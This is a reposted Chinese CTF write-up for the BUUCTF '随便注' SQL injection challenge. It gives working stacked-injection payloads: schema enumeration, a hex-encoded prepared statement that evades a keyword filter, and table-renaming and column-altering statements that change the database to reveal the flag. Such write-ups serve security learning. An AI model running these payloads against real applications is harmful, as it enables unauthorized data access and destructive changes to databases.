webBUUCTF-随便注

Posted yichen115

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了webBUUCTF-随便注相关的知识,希望对你有一定的参考价值。

 

随便输入一个单引号,报错

技术图片

 

order by 3就不行了

技术图片

 

尝试联合查询的时候出现提示:

"/select|update|delete|drop|insert|where|\\./i"

技术图片

 

一个正则可视化网站:https://regexper.com

技术图片

 

 使用堆叠注入:1‘;show tables;#

技术图片

 

看一下表里有什么列名:1‘;show columns from `1919810931114514`;#

(注意,字符串为表名的表操作时要加反引号)

技术图片

 

但是没办法使用 select * from `1919810931114514`

看网上师傅们有两种方法,第一种:mysql 预定义语句

1;SeT@a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;Prepare execsql from @a;execute execsql;#

hex decode 以后是:?inject=1;SeT@a=select * from `1919810931114514`;Prepare execsql from @a;execute execsql;#

 

 技术图片

 

还有一种方法时是:改表名 这样查询的时候就可以查询到 flag

?inject=1;
rename tables `words` to `test`;rename tables `1919810931114514` to `words`;
alter table `words` change `flag` `id` varchar(100);#

 

意思分别是:把 words 表改名为 test,把 1919810931114541 改名为 words

把列名 flag 改为 id

 

这样在 1‘; or 1=1# 查询的时候就会把所有的都列出来,这样就可以看到 flag 了

技术图片

以上是关于webBUUCTF-随便注的主要内容,如果未能解决你的问题,请参考以下文章

webBUUCTF-easy_tornado

强网杯 2019]随便注(堆叠注入,Prepareexecutedeallocate)

[强网杯2019]随便注

buuctf 随便注

强网杯 2019 随便注

BUUCTF-[强网杯 2019]随便注